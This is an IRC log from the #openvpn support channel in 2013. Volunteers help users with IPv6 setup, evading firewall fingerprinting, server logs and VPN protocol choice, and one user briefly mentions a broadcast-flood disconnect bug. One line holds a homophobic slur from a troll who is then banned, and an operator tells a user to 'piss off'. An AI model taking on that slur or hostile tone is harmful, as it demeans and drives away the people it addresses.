22:41 < pekster> Let's back up a step: what is your goal, what do you want to do? Are you currently IPv6 enabled on both your server and client?
22:45 < DaveTheDude> sorry, my grandma called
22:47 < DaveTheDude> my server is
22:47 < DaveTheDude> my home os is windows
22:48 < DaveTheDude> i don't have an ipv6 IP... but i get a lot of ipv6 network chatter
22:48 < pekster> If you don't have globally assigned IP space at least on the server, you'll be unable to assign usable IP space to clients
22:49 < pekster> You need to give OpenVPN a block of space, either a /112 or a /64 that it will then assign to clients
22:50 < pekster> If you don't have a PD (Prefix Delegation) or routed IPv6 block assigned to the server, you can't serve IPv6 access to clients
22:50 < DaveTheDude> this is what i have in my server's network interfaces
22:50 < DaveTheDude> iface eth0 inet6 static
22:50 < DaveTheDude> address 2001:1111:1:1111::1
22:50 < DaveTheDude> i changed the address
22:51 < DaveTheDude> actually i should have posted all of what is there
22:51 < pekster> !paste
22:51 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use
22:51 < pekster> !interface
22:51 <@vpnHelper> "interface" is (#1) paste interface configuration from both client and server, while being disconnected and when being connected. Be sure to also add the routing tables for both situations from client and from server or (#2) For Windows: iface: 'ipconfig /all' routing: 'route print' (add -4 or -6 for just IPv4 or v6) or (#3) For Unix: iface: 'ifconfig -a' routing: 'netstat -rn' or (#4) For Linux:
22:51 <@vpnHelper> iface: 'ip a' routing: 'ip r' (use ip -6 for IPv6 routes)
22:51 < pekster> But that's still largely irrelevant since you need a routed block to assign to OpenVPN
22:52 < pekster> It won't really help to know how you're connected to your upstream network
22:52 < pekster> This channel really isn't the right place to ask about how to get PD or route assignment/delegation working. #ipv6 might be a better place, but you need to know your own network details before you can expect to use openvpn with any of it
22:53 < pekster> Some guy a while back got on-link IPs working with clients in tun mode, but it required sorcery to get the server to respond to the NDP request
22:54 < DaveTheDude> http://pastebin.com/0s4gufnx
22:54 < DaveTheDude> is that sufficient?
22:54 < pekster> So, you want to use a routed block unless you're prepared to sacrifice a goat or whatever he did
22:54 < pekster> Probably not
22:54 < DaveTheDude> i see
22:55 < pekster> Unless you'd like to do whatever NDP proxying is required to expose on-link IPs to clients
22:55 < pekster> (the v6 version of ARP proxy)
22:55 < DaveTheDude> what exactly are the requirements to make the latest version of openvpn work with ipv6?
22:55 < pekster> So, re-read what I wrote above about obtaining a PD or routed block from your network provider, and then assign openvpn a /112 or /64 out of that as I described above
22:55 -!- latenite [~latenite@138.77.121.79] has joined #openvpn
22:56 < pekster> Instead of doing this through your VPN, why not just get a tunnel broker and set that up on your client if you want to get IPv6 access?
22:56 < DaveTheDude> is the "full ipv6 support" really meant for people who want to use specifically ipv6 and not just route their ipv6 and ipv4 traffic through openvpn?
22:57 < pekster> Sure. If you want IPv6 access across the tunnel, use a >=2.3.0 (patches exist for the 2.2 series too)
22:57 < DaveTheDude> yeah i used to use HE for that
22:57 < DaveTheDude> I will be updating to 2.3.0 tonight tho
22:58 < DaveTheDude> just using 2.3.0 won't actually route any and all ipv6 traffic through openvpn tho
22:58 < DaveTheDude> will it?
22:59 < DaveTheDude> i'll be using the debian repo found here https://community.openvpn.net/openvpn/wiki/OpenvpnSoftwareRepos
22:59 <@vpnHelper> Title: OpenvpnSoftwareRepos – OpenVPN Community (at community.openvpn.net)
22:59 < pekster> You need --route-ipv6 to push IPv6 routes, and of course that requires a v6 IP on both ends (via --tun-ipv6 and the relevant --ifconfig-ipv6 or --server-ipv6 options)
23:02 < pekster> Get your upstream IPv6 addressing & routes figured out first, then mess with openvpn after that's set up
23:02 < pekster> It's worthless to assign addresses you don't have
23:03 < DaveTheDude> i see
23:04 < DaveTheDude> so i would be better off to simply turn off ipv6 in windows
23:04 < pekster> Even a routed /64 should be fine; you can either let openvpn use that, or all you really need is a /112 from that range (since that gives you support for "up to 65,536" clients, more than you'll be able to connect)
23:05 < pekster> Well, if you have IPv6 access in Windows, I'm still confused why you want to get another address assigned on your server to start with
23:06 < pekster> It's not like tunneling through openvpn is going to give you anything special your HE tunnel doesn't already
23:06 < DaveTheDude> i no longer use HE
23:06 < pekster> If you have no IPv6 access on Windows, you don't need to turn anything off if you don't want it...
23:06 < DaveTheDude> and yes windows confuses me as well
23:06 < DaveTheDude> i do not have an ipv6 home address
23:07 < DaveTheDude> yet i see ipv6 network traffic frequently
23:07 < pekster> On your private LAN?
23:09 < DaveTheDude> i was trying to find an example
23:10 < DaveTheDude> i can't always tell where it is from or going
23:13 < DaveTheDude> well, thank you pekster
23:13 < DaveTheDude> have a good night.
23:14 -!- DaveTheDude [~FuckOff@69.85.93.87] has quit [Quit: Senkei.Senbonzakura.Kageyoshi]
23:14 < pekster> If you see RAs on your ISP's network, they're probably offering IPv6 access that way, and usually a PD if you ask for it via dhcpv6
23:14 < pekster> Well, that's #ipv6 land anyway I guess...
23:15 -!- MeanderingCode [~Meanderin@199.254.238.216] has joined #openvpn
23:16 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 240 seconds]
23:25 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
23:27 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
23:30 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
23:32 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
23:33 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
23:34 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
23:45 -!- Orbi [~opera@anon-147-110.vpn.ipredator.se] has joined #openvpn
23:47 -!- Orbi [~opera@anon-147-110.vpn.ipredator.se] has left #openvpn []
23:49 -!- latenite [~latenite@138.77.121.79] has quit [Ping timeout: 264 seconds]
--- Day changed Thu Mar 07 2013
00:00 -!- BasicXP [~basicxp@ubuntu/member/BasicXP] has quit [Ping timeout: 245 seconds]
00:02 -!- BasicXP [~basicxp@ubuntu/member/BasicXP] has joined #openvpn
00:11 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn
00:15 -!- ddlk [~ddlk@ec2-54-235-194-90.compute-1.amazonaws.com] has joined #openvpn
00:16 < ddlk> Hi, guys, I am wondering, is the openvpn packet detectable?
00:19 < pekster> Yes, when using X509 (also known as "server" or "TLS" modes of operation) the OpenVPN protocol has a detectable fingerprint
00:19 < pekster> Shared secret (by using the --secret option) uses symmetric encryption directly, so it appears as completely random data inside the UDP/TCP packet with no detectable fingerprint
00:20 < ddlk> Once the connection is established, the existence of vpn cannot be detected, right?
00:21 < ddlk> I am from China, every time I want to connect to my vpn server, I have to change its port, or the connection will not succeed
00:22 < pekster> You may have better luck using the p2p mode (instead of the server/client mode with certs) because otherwise your connections can be fingerprinted as OpenVPN by various packet inspection techniques
00:22 -!- latenite [~latenite@138.77.121.79] has joined #openvpn
00:23 < ddlk> But I have several devices (pc and mobile) that need to connect to vpn, p2p is not suitable for this
00:24 < ddlk> I once used pptpd, but it seems rather unstable, it disconnects a lot
00:24 < pekster> You would need multiple instances running on the server, but it is doable like that
00:25 < ddlk> I'll try the pre-shared key, hope it will work :D
00:26 < pekster> And if you haven't already, using some obscure randomly-chosen port is wise too: 1194 is the IANA standard for OpenVPN, and to mask what the encrypted traffic is you're better off picking something randomly above port 30000
00:26 < ddlk> wondering if there exists some vpn that cannot be detected, the GFW thing is really annoying
00:26 < pekster> There's also the obfs proxy project, but I don't have experience with that
00:26 < pekster> !obfs
00:26 <@vpnHelper> "obfs" is (#1) if you are looking to obfuscate your traffic to get through a firewall that recognizes and blocks openvpn, try using this proxy: obfsproxy https://www.torproject.org/projects/obfsproxy.html.en to encapsulate your packets in other protocols or (#2) http://community.openvpn.net/openvpn/wiki/TrafficObfuscation or (#3) in client/server mode an admin can know that openvpn is being used.
00:26 <@vpnHelper> in static-key mode they only know that it is some encrypted data, but not specifically openvpn; however with static-key you lose forward security (!forwardsecurity)
00:28 < ddlk> 1194 is long dead in China, every time I connect to the server, I have to choose another one.
00:28 < pekster> Right, chances are some DPI device flags the traffic and eventually blocks the IP and/or port you're using
00:29 < pekster> Hence my suggestion to use either static-key or look into that obfsproxy project to mask the fingerprint the spy device can use
00:29 < ddlk> Looking into obfsproxy ~
00:36 < ddlk> seems they only have a browser bundle for download
00:38 -!- mirco [~mirco@p508062C9.dip.t-dialin.net] has joined #openvpn
00:51 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
00:51 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
00:51 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
00:52 -!- mode/#openvpn [+o krzee] by ChanServ
00:52 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has quit [Quit: Computer has gone to sleep.]
00:53 -!- mezgani [~mezgani@41.249.4.68] has quit [Quit: Leaving]
00:57 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: Lost terminal]
01:09 < latenite> Hi folks, I have a little trouble choosing the right IP for my vpn server (on a VM) and clients. My openvpn server itself is on a subnet/29 I bought from my ISP. The first IP out of that subnet is bound to the br0 interface of the host (for the VMs). The second IP out of the subnet is bound to the eth0 of the VM that runs openvpn.
01:09 < latenite> Now...
01:10 < latenite> What do I set the "server ${serverip }${netmask}" directive out of server.conf to?
01:11 < latenite> This is the subnet I have:
01:12 < latenite> https://gist.github.com/anonymous/5106133
01:12 <@vpnHelper> Title: gist:5106133 (at gist.github.com)
01:12 < latenite> 5.9.243.145 is the host's br0
01:13 < latenite> 5.9.243.146 is the VM with openvpn
01:13 < latenite> the rest of the 4 IPs I want the server to hand out to clients...statically
01:33 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer]
01:38 -!- Porkepix [~Porkepix@157.138.184.18] has joined #openvpn
01:39 -!- mirco [~mirco@p508062C9.dip.t-dialin.net] has quit [Quit: mirco]
01:46 -!- eHAPPY [~V1CE@ip174-73-3-95.no.no.cox.net] has joined #openvpn
01:47 < eHAPPY> ok im really having a hard time getting openvpn setup on linux; is there any way to get it facing a public IP without generating keys first? it works just fine on my LAN but can't push UDP/TCP to the public IP
01:49 -!- newbie|3 [~tjz@bb219-74-43-126.singnet.com.sg] has quit [Read error: Connection reset by peer]
01:50 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn
01:54 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds]
01:56 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
02:03 -!- dazo_afk is now known as dazo
02:06 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn
02:08 -!- _ddlk_ [~ddlk@183.246.96.191] has joined #openvpn
02:09 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
02:10 -!- ddlk [~ddlk@ec2-54-235-194-90.compute-1.amazonaws.com] has quit [Read error: Connection reset by peer]
02:10 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
02:22 -!- Porkepix [~Porkepix@157.138.184.18] has quit [Ping timeout: 255 seconds]
02:24 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn
02:24 -!- Porkepix [~Porkepix@157.138.76.100] has joined #openvpn
02:32 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Quit: mirco]
02:36 -!- Porkepix_ [~Porkepix@ks353551.kimsufi.com] has joined #openvpn
02:38 -!- Porkepix [~Porkepix@157.138.76.100] has quit [Ping timeout: 260 seconds]
02:38 -!- Porkepix_ is now known as Porkepix
02:44 -!- _ddlk_ [~ddlk@183.246.96.191] has quit [Ping timeout: 245 seconds]
02:45 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
02:54 -!- excalibr [~excalibr@unaffiliated/excalibr] has joined #openvpn
02:54 < excalibr> hello
03:00 -!- excalibr [~excalibr@unaffiliated/excalibr] has quit [Quit: WeeChat 0.4.0]
03:09 -!- zz_AsadH is now known as AsadH
03:10 -!- Saviq [~Saviq@sawicz.net] has quit [Changing host]
03:10 -!- Saviq [~Saviq@canonical/saviq] has joined #openvpn
03:18 -!- Saviq [~Saviq@canonical/saviq] has left #openvpn ["Ex-Chat"]
03:29 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds]
03:40 -!- Porkepix [~Porkepix@ks353551.kimsufi.com] has quit [Ping timeout: 248 seconds]
03:47 -!- JSharpe [~JSharpe@46.165.221.13] has joined #openvpn
03:50 -!- Porkepix [~Porkepix@157.138.184.18] has joined #openvpn
03:55 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
03:55 -!- Porkepix [~Porkepix@157.138.184.18] has quit [Ping timeout: 250 seconds]
03:58 -!- Porkepix [~Porkepix@ks353551.kimsufi.com] has joined #openvpn
04:02 -!- JackWinter [~jack@ppp-256.vo.lu] has quit [Quit: ZNC - http://znc.in]
04:03 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn
04:14 -!- gedO [~quassel@esc.ortopedija.lt] has joined #openvpn
04:14 -!- gedO [~quassel@esc.ortopedija.lt] has quit [Remote host closed the connection]
05:03 -!- MeanderingCode [~Meanderin@199.254.238.216] has quit [Remote host closed the connection]
05:12 -!- AsadH is now known as zz_AsadH
05:15 -!- zz_AsadH is now known as AsadH
05:26 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
05:26 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
05:26 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
05:26 -!- mode/#openvpn [+o krzee] by ChanServ
05:33 -!- dxtr [~dxtr@unaffiliated/dxtr] has joined #openvpn
05:42 -!- Porkepix [~Porkepix@ks353551.kimsufi.com] has quit [Ping timeout: 248 seconds]
05:49 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Excess Flood]
05:57 -!- dxtr [~dxtr@unaffiliated/dxtr] has quit [Quit: Reconnecting]
05:57 -!- dxtr [cfc05a40@unaffiliated/dxtr] has joined #openvpn
06:05 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn
06:22 -!- lolmaus [~lolmaus@178.236.241.96] has joined #openvpn
06:25 < lolmaus> I've got a virtual machine that i launch on different hosts under different networks. I would like this virtual machine to be available with a static IP. Can i achieve that using OpenVPN and a VDS?
06:31 <+EugeneKay> VDS?
06:31 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds]
06:31 < lolmaus> EugeneKay, virtual dedicated server, aka VPS
06:31 <@krzee> venereal disease?
06:31 <@krzee> diseases*
06:31 <+EugeneKay> Then say VPS.
06:31 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
06:32 <+EugeneKay> VDS is a term nobody uses except scumbag OpenVZ providers when they decide to sell you a "premium" instance.
06:32 <+EugeneKay> And yes, you can do that with openvpn+a bit of NAT magic
06:32 <@krzee> watching and loving the filibuster
06:34 <@plaisthos> virtual dedicated ...
06:34 <+EugeneKay> I try not to care about politics. I can only handle so many stupid people.
06:34 <@plaisthos> would you like some dry water with that?
06:34 <@krzee> haha no kidding
06:35 < rob0> Virus distribution station
06:35 < lolmaus> I can do that too. Vietnamese Professionals Society
06:36 <+EugeneKay> That's not even funny
06:41 <@krzee> womp wommmp
06:42 -!- Porkepix [~Porkepix@ks353551.kimsufi.com] has joined #openvpn
06:46 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 250 seconds]
06:50 < kjs> Guys, if an openvpn client can't access the cert / key files would it give me an error or just fail to connect ?
06:51 < kjs> I see nothing in the connect server logs when I attempt to connect my client
06:51 -!- lolmaus [~lolmaus@178.236.241.96] has quit [Read error: Connection reset by peer]
06:51 <@krzee> !logs
06:52 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it and select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile
06:52 -!- lolmaus [~lolmaus@178.236.241.96] has joined #openvpn
06:53 -!- tjz [~tjz@unaffiliated/tjz] has quit [Ping timeout: 248 seconds]
06:54 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
07:01 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn
07:02 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
07:17 < kjs> i see...
07:17 < kjs> 5/CN=server.does.not.exists/dnQualifier=server
07:18 < kjs> from the client
07:18 < kjs> server side i see nothing
07:31 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Max SendQ exceeded]
07:32 <@ecrist> kjs: we need to see your logs
07:32 <@ecrist> just because YOU don't see anything doesn't mean we won't
07:37 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn
07:53 < kjs> ecrist: what I mean is I don't see anything server side
07:55 < kjs> in openvpn-status.log
07:56 < kisom> pekster: Hey, did you have time to try out my conf yet?
08:00 <@ecrist> kjs: that's not the log we want
08:00 <@ecrist> the status log is for current connections, and isn't much of a log, really
08:01 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 248 seconds]
08:13 < kjs> ecrist: where can I find the useful log info?
08:16 <@ecrist> do you have a verb line in your server config?
08:16 <@ecrist> if not, do like vpnHelper said above and set verb to 5 and restart the server
08:16 <@ecrist> not the whole server, just the openvpn process
08:18 < kjs> Yes
08:18 < kjs> it's there
08:18 <@ecrist> do you have a log line?
08:18 < kjs> i did a reload
08:18 < kjs> not restart, that should suffice?
08:19 <@ecrist> no
08:20 -!- genghi [~Adium@2.171.156.135] has quit [Remote host closed the connection]
08:20 -!- meepmeep [~meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 245 seconds]
08:24 -!- mattock [~mattock@openvpn/corp/admin/mattock] has left #openvpn []
08:24 -!- mattock [~mattock@openvpn/corp/admin/mattock] has joined #openvpn
08:24 -!- mode/#openvpn [+o mattock] by ChanServ
08:33 -!- qmr [~qmr@50.116.18.140] has quit [Ping timeout: 264 seconds]
08:35 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds]
08:36 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn
08:42 -!- marksaitis [~marksaiti@gemsyorkroad.demon.co.uk] has joined #openvpn
08:44 -!- levifig [~levifig@spwn.co] has joined #openvpn
08:48 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn
08:50 -!- qmr [~qmr@50.116.18.140] has joined #openvpn
08:50 -!- KaiForce [~chatzilla@adsl-70-228-81-145.dsl.akrnoh.ameritech.net] has joined #openvpn
08:51 -!- marksaitis [~marksaiti@gemsyorkroad.demon.co.uk] has quit [Read error: Connection reset by peer]
08:52 -!- roror [~rororo@180.168.11.26] has joined #openvpn
08:53 < levifig> are there any advantages of switching to OpenVPN from L2TP for a network of routers? We basically connect all our client's routers (that we install/use for hosted services) to our VPN concentrator… We're using L2TP at the moment but I've been researching OpenVPN…
08:54 -!- Porkepix [~Porkepix@ks353551.kimsufi.com] has quit [Ping timeout: 252 seconds]
08:55 < kjs> ecrist: I see TLS handshake failed
08:55 < kjs> could it be the CA.crt is wrong that i signed the keys again...
08:55 < levifig> from my research, there doesn't seem to be that big of a benefit for this particular application… We're using MikroTik routers (RouterOS) so we're limited to TCP and no LZO compression anyway on their OpenVPN implementation…
08:57 < kisom> levifig: I'm not really sure why you'd want to migrate a fully functioning L2TP setup?
08:57 < levifig> kisom: actually, I started migrating this from PPTP :)
08:58 < rob0> eww.
08:58 < levifig> kisom: as I'm doing so, I decided to consider OpenVPN
08:58 <@ecrist> kjs: post your logs or piss off
08:58 < levifig> rob0: agree :)
08:58 < levifig> rob0: it was what they had when I got here :X
08:58 -!- roror [~rororo@180.168.11.26] has quit [Ping timeout: 252 seconds]
08:59 < kisom> levifig: Performance-wise I don't think OpenVPN has any huge advantage over L2TP.
08:59 < rob0> Nice thing about OpenVPN is that it's modular. If something is wrong in part of it, such as the openssl libraries, it's easier to fix.
08:59 < rob0> Performance-wise ipsec should generally win, but not by a major factor.
09:02 < levifig> the problem I'm facing is the whole certificate nightmare
09:02 < levifig> for what we do, user/secret tends to be easier
09:03 < levifig> since these are machines connecting to each other, with no user access (just admin), the security/streamlined certificate access seems to be too much work for what it gives…
09:03 < levifig> am I missing something or does this make sense?
09:05 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 256 seconds]
09:07 -!- Porkepix [~Porkepix@ks353551.kimsufi.com] has joined #openvpn
09:12 -!- EasterBunny [mis7er@kn.ock.in] has joined #openvpn
09:13 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn
09:14 < kjs> ecrist: pretty rude, I can't paste server side logs, only access is via console, which is why I typed that part of the log. I don't expect help here but I also don't expect to be told to piss off.
09:15 < EasterBunny> yeah ecrist fag
09:15 -!- mode/#openvpn [+o EugeneKay] by ChanServ
09:15 -!- mode/#openvpn [+b *!*mis7er@*.ock.in] by EugeneKay
09:15 -!- EasterBunny was kicked from #openvpn by EugeneKay [Easter is next month]
09:16 < kisom> levifig: And what happens when a user roots your hardware?
09:16 < kisom> levifig: Certificates can be revoked, shared secrets can't.
09:16 <@EugeneKay> !both
09:16 <@vpnHelper> "both" is If you do not control both ends of the link (server and client) then there is not much we can do to help you. Please talk to your network admin instead.
09:16 <@ecrist> lol
09:16 <@EugeneKay> kjs ^ that's why we ask for server logs.
09:16 <@EugeneKay> !refund
09:16 < kjs> I understand...
09:16 <@EugeneKay> Hrm, guess this bot doesn't have it
09:17 <@ecrist> kjs: didn't we discuss this copy/paste thing the other day?
09:17 -!- EasterBunny [mis7er@fedcirc.net] has joined #openvpn
09:17 -!- mode/#openvpn [+b *!*@fedcirc.net] by ecrist
09:17 -!- EasterBunny was kicked from #openvpn by ecrist [EasterBunny]
09:17 < levifig> kisom: hmmm… good point!
09:17 * dazo wonders what he missed about EasterBunny now :)
09:17 < kjs> ecrist: no?
09:17 -!- EasterBunny [mis7er@dumbhead.net] has joined #openvpn
09:17 < EasterBunny> it's this month
09:18 < EasterBunny> 31st
09:18 -!- mode/#openvpn [+b *!*@dumbhead.net] by ecrist
09:18 -!- EasterBunny was kicked from #openvpn by ecrist [EasterBunny]
09:18 -!- mode/#openvpn [+b EasterBunny!*@*] by EugeneKay
09:18 < kjs> actually i can get the logs
09:18 * dazo suddenly understood it
09:18 < kjs> I'll email myself the file - doh!
09:18 <@EugeneKay> kjs - what's wrong with SSH?
09:19 < kjs> I can't access that host via ssh, it's on a separate isolated subnet.
09:19 < kjs> unless I connect over the vpn... Which obviously I can't
09:19 < kjs> ;)
09:19 <@EugeneKay> If you can get mail out, you can get SSH in
09:19 < levifig> kisom: if we had a CA setup it'd be a good thing… we just don't have that in our infrastructure ATM :X
09:19 <@EugeneKay> It just takes a lil networking
09:19 < kjs> yeah it's setup like this for a reason
09:19 <@ecrist> levifig: a CA would be ideal
09:19 < kjs> and no, not just to piss me off...
09:20 < kisom> levifig: Also, OpenVPN over TCP is broken at the moment, so if MikroTik can only use TCP then I'd stick to L2TP.
09:20 <@ecrist> kisom: it is?
09:20 < levifig> :o
09:20 < kisom> ecrist: Ticket 263.
09:20 < kisom> Nobody seems to notice it.
09:21 < kisom> I'm just about to post to openvpn-devel
09:21 <@dazo> kisom: I'm using 2.3 with TCP successfully
09:21 <@dazo> on two different servers
09:21 <@EugeneKay> !learn refund as If you are not satisfied with the GPL openvpn, or the support provided by the volunteers of #openvpn, you are entitled to a full refund of the purchase price and are invited to use another VPN solution. Elsewhere.
09:21 <@vpnHelper> Error: You don't have the factoids.learn capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified.
09:21 <@dazo> and a couple of clients
09:21 <@EugeneKay> Damn you, bot.
09:22 < kisom> dazo: It works when the network load isn't too high.
09:22 < kisom> If you send packets faster than the connection can handle, the connection breaks and openvpn reports a crypto error.
09:22 <@plaisthos> !learn refund as If you are not satisfied with the GPL openvpn, or the support provided by the volunteers of #openvpn, you are entitled to a full refund of the purchase price and are invited to use another VPN solution. Elsewhere.
09:22 <@vpnHelper> Joo got it.
09:22 <@plaisthos> EugeneKay: no idea why it does not like you
09:22 < kisom> It's all explained in the ticket + config files to be used for reproducing the bug.
09:23 <@ecrist> EugeneKay: it's borked again
09:23 <@ecrist> krzee *fixed* it
09:23 <@EugeneKay> plaisthos - because I'm not on an @openvpn/ cloak; my bot account was separate, and ecrist hasn't fixed it since he borked the bot.
09:23 <@ecrist> no, I fixed it, and krzee re-fixed it
09:23 <@EugeneKay> Ah.
09:23 <@EugeneKay> Well, fix harder
09:23 < rob0> !blame
09:23 <@vpnHelper> "blame" is (#1) According to Bushmills, it's always krzee's fault or (#2) According to krzee, it's always dazo's fault or (#3) and dazo will always blame EugeneKay, Bushmills, ecrist or any other sensible victims in the required moments or (#4) cron2 says its always d12fk's fault (and sometimes the customers)
09:23 <@ecrist> heh
09:24 <@plaisthos> EugeneKay: you try to get a refund from the bot ;)
09:24 <@ecrist> !learn refund as If you are not satisfied with the GPL openvpn, or the support provided by the volunteers of #openvpn, you are entitled to a full refund of the purchase price and are invited to use another VPN solution. Elsewhere.
09:24 <@vpnHelper> Error: You don't have the factoids.learn capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified.
09:24 <@EugeneKay> Meh, I wore my OpenVPN shirt yesterday. I think that's good enough.
09:24 <@ecrist> :(
09:24 <@EugeneKay> Today it's my Tor shirt
09:24 <@plaisthos> !whoami
09:24 <@vpnHelper> developers
09:25 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
09:25 -!- mode/#openvpn [+o krzee] by ChanServ
09:26 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: leaving]
09:28 <@ecrist> plaisthos: can you add that factoid, please?
09:29 <@EugeneKay> He did.
09:29 <@EugeneKay> !refund
09:29 <@vpnHelper> "refund" is If you are not satisfied with the GPL openvpn, or the support provided by the volunteers of #openvpn, you are entitled to a full refund of the purchase price and are invited to use another VPN solution. Elsewhere.
09:29 < kjs> haha
09:32 <@ecrist> oh, neat
09:32 < kisom> dazo: Can you try flooding a client over your VPN and see if it disconnects? :)
09:32 -!- MacGyver [~MacGyver@unaffiliated/macgyvernl] has joined #openvpn
09:34 < MacGyver> I've got two questions. First, if I run OpenVPN on the client not in daemon mode, and drop privileges after startup, how can I ever get it to cleanly remove its routes when closing the tunnel using ctrl+C?
09:35 -!- corretico [~luis@190.211.93.38] has quit [Ping timeout: 256 seconds]
09:35 < MacGyver> Second, suppose I'm on a network whose DNS I want to continue to use, but *only* for the domain "localdomain", and for all others I want to use the pushed DNS. Furthermore, as soon as the VPN closes, the domain's DNS-server should be used again for all domains. Is there any easy way to do that?
09:36 <@dazo> kisom: I'll try ... don't have time right now, but will run some tests on that
09:40 < kisom> dazo: OK, fair enough. If you're running a layer 2 network and have --client-to-client enabled then you can flood the broadcast address, causing all clients to disconnect.
09:41 * dazo uses TUN ;-)
09:41 <@dazo> (and no client-to-client)
09:41 < kisom> I would too if I didn't need broadcasts ;)
09:47 -!- lolmaus [~lolmaus@178.236.241.96] has quit []
09:49 -!- mattock is now known as mattock_afk
09:50 < latenite> Hi folks, can someone please help me with my IP issue I've got?
09:50 < pulz> im trying to add a static ip to an openvpn client based on the ca, using the ipconfig-push 10.8.0.250 10.8.0.0; command, but it doesn't seem to work, any suggestions?
09:51 <@dazo> !ask
09:51 <@vpnHelper> "ask" is don't ask to ask, just ask your question please, see this link for how to get help on IRC: http://workaround.org/getting-help-on-irc
09:51 <@dazo> latenite: ^^^
09:52 < latenite> Hi folks, I have a little trouble choosing the right IP for my vpn server (on a VM) and clients. My openvpn server itself is on a subnet/29 I bought from my ISP. The first IP out of that subnet is bound to the br0 interface of the host (for the VMs). The second IP out of the subnet is bound to the eth0 of the VM that runs openvpn.
09:52 < latenite> Now...
09:52 < latenite> What do I set the "server ${serverip }${netmask}" directive out of server.conf to?
09:52 < latenite> This is my Subnet I have:
09:52 < latenite> https://gist.github.com/anonymous/5106133
09:52 <@vpnHelper> Title: gist:5106133 (at gist.github.com)
09:53 < MacGyver> pulz: 10.8.0.0 is not a valid IP-address.
09:53 < MacGyver> pulz: Or rather.
09:53 < MacGyver> pulz: It's not a valid host address.
09:53 < latenite> ...trouble is: What if I set it to "server 5.9.243.144 255.255.255.248"? Then the server itself would get 5.9.243.145 which is already assigned to the VM running openvpn
09:53 <@dazo> latenite: for simplicity ... use an !rfc1918 address
09:54 <@dazo> !rfc1918
09:54 <@dazo> !1918
09:54 <@vpnHelper> "1918" is (#1) RFC1918 makes three unique netblocks available for private use: 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16 or (#2) see also: http://en.wikipedia.org/wiki/Private_network or http://www.faqs.org/rfcs/rfc1918.html or (#3) Too lazy to find your own subnet? Try this one: http://scarydevilmonastery.net/subnet.cgi
09:54 < latenite> dazo, MacGyver I know it's the network address
09:54 * dazo thinks MacGyver replied to pulz, though ....
09:55 < latenite> I did get me a range of IPs that are "real" and not rfc1918 ...so I can hand them out to clients of the vpn
09:55 < latenite> ..but I already use 2 of them for the host's bridge and the VM running openvpn
09:55 < MacGyver> latenite: Unless you and pulz are the same person / team, I wasn't replying to your issue.
09:55 < latenite> MacGyver, ohh ok. sorry :D
